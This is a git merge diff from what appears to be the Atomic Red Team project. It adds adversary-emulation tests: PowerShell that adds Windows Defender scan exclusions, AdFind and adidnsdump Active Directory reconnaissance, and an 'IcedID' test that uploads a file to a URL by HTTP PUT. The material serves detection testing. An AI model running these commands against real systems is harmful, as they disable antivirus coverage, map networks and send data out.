Merge branch 'master' into pipe

2020-07-17 09:00:31 -04:00
parent 0cb2588b37 5b5a60d418
commit b98da5e2ee
22 changed files with 779 additions and 12 deletions
@@ -0,0 +1,19 @@
+---
+name: Submit a new test
+about: Submit a new Atomic Red Team atomic test.
+title: 'TXXX: Your test name here'
+labels: 'new-test'
+assignees: ''
+
+---
+
+<!--
+For reference, check out this article that explains how to properly submit a new atomic test: https://atomicredteam.io/contributing#how-to-contribute.
+-->
+
+### Technique ID: TXXXX
+
+### Additional Details
+<!--
+Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition. 
+-->
@@ -257,6 +257,9 @@ defense-evasion,T1562.001,Disable or Modify Tools,17,Disable Microsoft Office Se
 defense-evasion,T1562.001,Disable or Modify Tools,18,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,19,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,20,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,21,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
 defense-evasion,T1551.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1551.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1551.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
@@ -430,6 +433,7 @@ discovery,T1087.002,Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5a
 discovery,T1087.002,Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
 discovery,T1087.002,Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
 discovery,T1087.002,Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
+discovery,T1087.002,Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -486,6 +490,7 @@ discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
 discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
+discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps,ba62ce11-e820-485f-9c17-6f3c857cd840,sh
@@ -633,6 +638,7 @@ collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f05622
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
 collection,T1113,Screen Capture,4,Import,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
+exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
@@ -92,6 +92,9 @@ defense-evasion,T1562.001,Disable or Modify Tools,17,Disable Microsoft Office Se
 defense-evasion,T1562.001,Disable or Modify Tools,18,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,19,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,20,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,21,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
 defense-evasion,T1551.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1551.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
 defense-evasion,T1551.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
@@ -260,6 +263,7 @@ discovery,T1087.002,Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5a
 discovery,T1087.002,Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
 discovery,T1087.002,Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
 discovery,T1087.002,Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
+discovery,T1087.002,Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -293,6 +297,7 @@ discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5
 discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6db1f57f-d1d5-4223-8a66-55c9c65a9592,command_prompt
 discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
 discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
+discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
@@ -389,6 +394,7 @@ execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software
 execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
 execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
 execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
+exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
@@ -517,6 +517,9 @@
  - Atomic Test #18: Remove Windows Defender Definition Files [windows]
  - Atomic Test #19: Stop and Remove Arbitrary Security Windows Service [windows]
  - Atomic Test #20: Uninstall Crowdstrike Falcon on Windows [windows]
+  - Atomic Test #21: Tamper with Windows Defender Evade Scanning -Folder [windows]
+  - Atomic Test #22: Tamper with Windows Defender Evade Scanning -Extension [windows]
+  - Atomic Test #23: Tamper with Windows Defender Evade Scanning -Process [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -829,6 +832,7 @@
  - Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
  - Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
  - Atomic Test #4: Automated AD Recon (ADRecon) [windows]
+  - Atomic Test #5: Adfind -Listing password policy [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
  - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
  - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -900,6 +904,7 @@
  - Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
  - Atomic Test #7: Remote System Discovery - sweep [linux, macos]
  - Atomic Test #8: Remote System Discovery - nslookup [windows]
+  - Atomic Test #9: Remote System Discovery - adidnsdump [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #1: Security Software Discovery [windows]
  - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1189,7 +1194,8 @@
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

 # exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1020 Automated Exfiltration](../../T1020/T1020.md)
+  - Atomic Test #1: IcedID Botnet HTTP PUT [windows]
 - [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
  - Atomic Test #1: Data Transfer Size Limits [macos, linux]
 - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
@@ -180,6 +180,9 @@
  - Atomic Test #18: Remove Windows Defender Definition Files [windows]
  - Atomic Test #19: Stop and Remove Arbitrary Security Windows Service [windows]
  - Atomic Test #20: Uninstall Crowdstrike Falcon on Windows [windows]
+  - Atomic Test #21: Tamper with Windows Defender Evade Scanning -Folder [windows]
+  - Atomic Test #22: Tamper with Windows Defender Evade Scanning -Extension [windows]
+  - Atomic Test #23: Tamper with Windows Defender Evade Scanning -Process [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -535,6 +538,7 @@
  - Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
  - Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
  - Atomic Test #4: Automated AD Recon (ADRecon) [windows]
+  - Atomic Test #5: Adfind -Listing password policy [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
  - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
  - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -583,6 +587,7 @@
  - Atomic Test #4: Remote System Discovery - ping sweep [windows]
  - Atomic Test #5: Remote System Discovery - arp [windows]
  - Atomic Test #8: Remote System Discovery - nslookup [windows]
+  - Atomic Test #9: Remote System Discovery - adidnsdump [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #1: Security Software Discovery [windows]
  - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -785,7 +790,8 @@
  - Atomic Test #6: WMI Execute Remote Process [windows]

 # exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1020 Automated Exfiltration](../../T1020/T1020.md)
+  - Atomic Test #1: IcedID Botnet HTTP PUT [windows]
 - T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1,7 +1,7 @@
 # All Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash](../../T1059.004/T1059.004.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
@@ -1,7 +1,7 @@
 # Windows Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
@@ -22777,6 +22777,72 @@ defense-evasion:
          -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
        name: powershell
        elevation_required: true
+    - name: Tamper with Windows Defender Evade Scanning -Folder
+      auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed
+      description: "Malware can exclude a specific path from being scanned and evading
+        detection. \nUpon successul execution, the file provided should be on the
+        list of excluded path. \nTo check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        excluded_folder:
+          description: This folder will be excluded from scanning
+          type: String
+          default: C:\Temp
+      executor:
+        command: |-
+          $excludedpath= "#{excluded_folder}"
+          Add-MpPreference -ExclusionPath $excludedpath
+        cleanup_command: |
+          $excludedpath= "#{excluded_folder}"
+          Remove-MpPreference -ExclusionPath $excludedpath
+        name: powershell
+        elevation_required: true
+    - name: Tamper with Windows Defender Evade Scanning -Extension
+      auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea
+      description: "Malware can exclude specific extensions from being scanned and
+        evading detection. \nUpon successful execution, the extension(s) should be
+        on the list of excluded extensions.\nTo check the exclusion list using poweshell
+        \ (Get-MpPreference).ExclusionExtension.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        excluded_exts:
+          description: A list of extension to exclude from scanning
+          type: string
+          default: ".exe"
+      executor:
+        command: |-
+          $excludedExts= "#{excluded_exts}"
+          Add-MpPreference -ExclusionExtension  $excludedExts
+        cleanup_command: |
+          $excludedExts= "#{excluded_exts}"
+          Remove-MpPreference -ExclusionExtension  $excludedExts
+        name: powershell
+        elevation_required: true
+    - name: Tamper with Windows Defender Evade Scanning -Process
+      auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27
+      description: "Malware can exclude specific processes from being scanned and
+        evading detection.\nUpon successful execution, the process(es) should be on
+        the list of excluded processes. \nTo check the exclusion list using poweshell
+        \ (Get-MpPreference).ExclusionProcess.\"\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        excluded_process:
+          description: A list of processes to exclude from scanning
+          type: string
+          default: outlook.exe
+      executor:
+        command: |-
+          $excludedProcess = "#{excluded_process}"
+          Add-MpPreference -ExclusionProcess $excludedProcess
+        cleanup_command: |
+          $excludedProcess = "#{excluded_process}"
+          Remove-MpPreference -ExclusionProcess  $excludedProcess
+        name: powershell
+        elevation_required: true
  T1078.002:
    technique:
      external_references:
@@ -35564,6 +35630,20 @@ discovery:
          Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null
          Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
        name: powershell
+    - name: Adfind -Listing password policy
+      auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
+      description: |
+        Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
+        reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
+      supported_platforms:
+      - windows
+      executor:
+        command: 'PathToAtomicsFolder\T1087.002\src\AdFind -default -s base lockoutduration
+          lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength
+          pwdhistorylength pwdproperties
+
+'
+        name: powershell
  T1069.002:
    technique:
      external_references:
@@ -37334,6 +37414,44 @@ discovery:
          foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
        name: powershell
        elevation_required: true
+    - name: Remote System Discovery - adidnsdump
+      auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959
+      description: |
+        This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
+        Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
+        Successful execution of this test will list dns zones in the terminal.
+      supported_platforms:
+      - windows
+      input_arguments:
+        user_name:
+          description: username including domain.
+          type: string
+          default: domain\user
+        acct_pass:
+          description: Account password.
+          type: string
+          default: password
+        host_name:
+          description: hostname or ip address to connect to.
+          type: string
+          default: 192.168.1.1
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Computer must have python 3 installed
+        prereq_command: if (python --version) {exit 0} else {exit 1}
+        get_prereq_command: echo "Python 3 must be installed manually"
+      - description: Computer must have pip installed
+        prereq_command: if (pip3 -V) {exit 0} else {exit 1}
+        get_prereq_command: echo "PIP must be installed manually"
+      - description: adidnsdump must be installed and part of PATH
+        prereq_command: if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+        get_prereq_command: pip3 install adidnsdump
+      executor:
+        command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+
+'
+        name: command_prompt
+        elevation_required: true
  T1518.001:
    technique:
      external_references:
@@ -47973,7 +48091,36 @@ exfiltration:
      - macOS
      - Windows
      x_mitre_is_subtechnique: false
-    atomic_tests: []
+      identifier: T1020
+    atomic_tests:
+    - name: IcedID Botnet HTTP PUT
+      auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
+      description: |-
+        Creates a text file
+        Tries to upload to a server via HTTP PUT method with ContentType Header
+        Deletes a created file
+      supported_platforms:
+      - windows
+      input_arguments:
+        file:
+          description: Exfiltration File
+          type: String
+          default: C:\temp\T1020_exfilFile.txt
+        domain:
+          description: Destination Domain
+          type: url
+          default: https://google.com
+      executor:
+        command: |-
+          $fileName = "#{file}"
+          $url = "#{domain}"
+          $file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
+          $contentType = "application/octet-stream"
+          try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
+        cleanup_command: |-
+          $fileName = "#{file}"
+          Remove-Item -Path $fileName -ErrorAction Ignore
+        name: powershell
  T1030:
    technique:
      id: attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd
@@ -22,6 +22,8 @@ Specific to macOS, the <code>bonjour</code> protocol exists to discover addition

 - [Atomic Test #8 - Remote System Discovery - nslookup](#atomic-test-8---remote-system-discovery---nslookup)

